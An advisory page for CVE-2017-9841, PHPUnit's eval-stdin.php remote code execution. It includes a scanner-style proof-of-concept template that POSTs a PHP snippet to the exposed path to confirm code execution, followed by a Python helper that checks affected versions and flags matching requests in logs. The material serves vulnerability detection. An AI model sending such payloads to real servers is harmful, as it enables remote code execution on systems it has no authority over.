Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
PoC code [public]
id: CVE-2017-9841
info:
  name: phpunit rce
  author: p0wd3r,buchixifan
  severity: high
  description: |-
    Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-9841
  tags: cve,cve2017,phpunit,rce
  created: 2023/08/10
set:
  rand: randomInt(2000000000, 2100000000)
rules:
  r0:
    request:
      method: POST
      path: /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
      body: <?=print(md5({{rand}}));?>
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
expression: r0()
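As an added example (not part of the advisory or of the PoC template above): a Python helper for the defending side that checks a PHPUnit version string against the affected ranges stated above (before 4.8.28, and 5.x before 5.6.3) and flags request records that match the pattern the template sends, a POST to the eval-stdin.php path whose body opens with a PHP tag. The record layout and the sample requests are constructed for illustration, not captured traffic.

```python
import re

# Path named in the advisory; reachable when the /vendor tree is web-exposed.
EVAL_STDIN_SUFFIX = "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"
# eval-stdin.php executes POST data as PHP, so flag bodies opening with a PHP tag
# ("<?php ", the short "<?=" the template uses, or a bare "<?" plus whitespace).
PHP_OPEN_TAG = re.compile(rb"^\s*<\?(php\b|=|\s)", re.IGNORECASE)

def parse_version(v: str) -> tuple:
    """Turn '4.8.27' or '5.6.3-dev' into a comparable (major, minor, patch) tuple."""
    nums = []
    for part in v.strip().split(".")[:3]:
        m = re.match(r"\d+", part)
        nums.append(int(m.group()) if m else 0)
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)

def is_vulnerable_version(v: str) -> bool:
    """Affected ranges from the advisory: before 4.8.28, and 5.x before 5.6.3."""
    t = parse_version(v)
    return t < (4, 8, 28) or (5, 0, 0) <= t < (5, 6, 3)

def normalize_path(path: str) -> str:
    """Drop the query string and collapse repeated slashes before comparing."""
    path = re.sub(r"/{2,}", "/", path.split("?", 1)[0])
    return path.lower()

def is_eval_stdin_probe(method: str, path: str, body: bytes) -> bool:
    """True for a POST to eval-stdin.php whose body starts with a PHP open tag."""
    if method.upper() != "POST":
        return False
    if not normalize_path(path).endswith(EVAL_STDIN_SUFFIX.lower()):
        return False
    return PHP_OPEN_TAG.match(body) is not None

def find_probes(records):
    """Indexes of request records {method, path, body} matching the pattern."""
    return [i for i, r in enumerate(records)
            if is_eval_stdin_probe(r["method"], r["path"], r["body"])]

# Constructed sample request records (hypothetical, not captured traffic).
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/index.php", "body": b""},
    {"method": "POST", "path": EVAL_STDIN_SUFFIX, "body": b"<?php echo 1; ?>"},
    {"method": "POST", "path": "//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php?x=1",
     "body": b"  <?=print(md5(1));?>"},
    {"method": "POST", "path": EVAL_STDIN_SUFFIX, "body": b"plain text, not PHP"},
]
```

Versions outside the two ranges the advisory names (6.x and later) are not flagged by `is_vulnerable_version`, since the page says nothing about them.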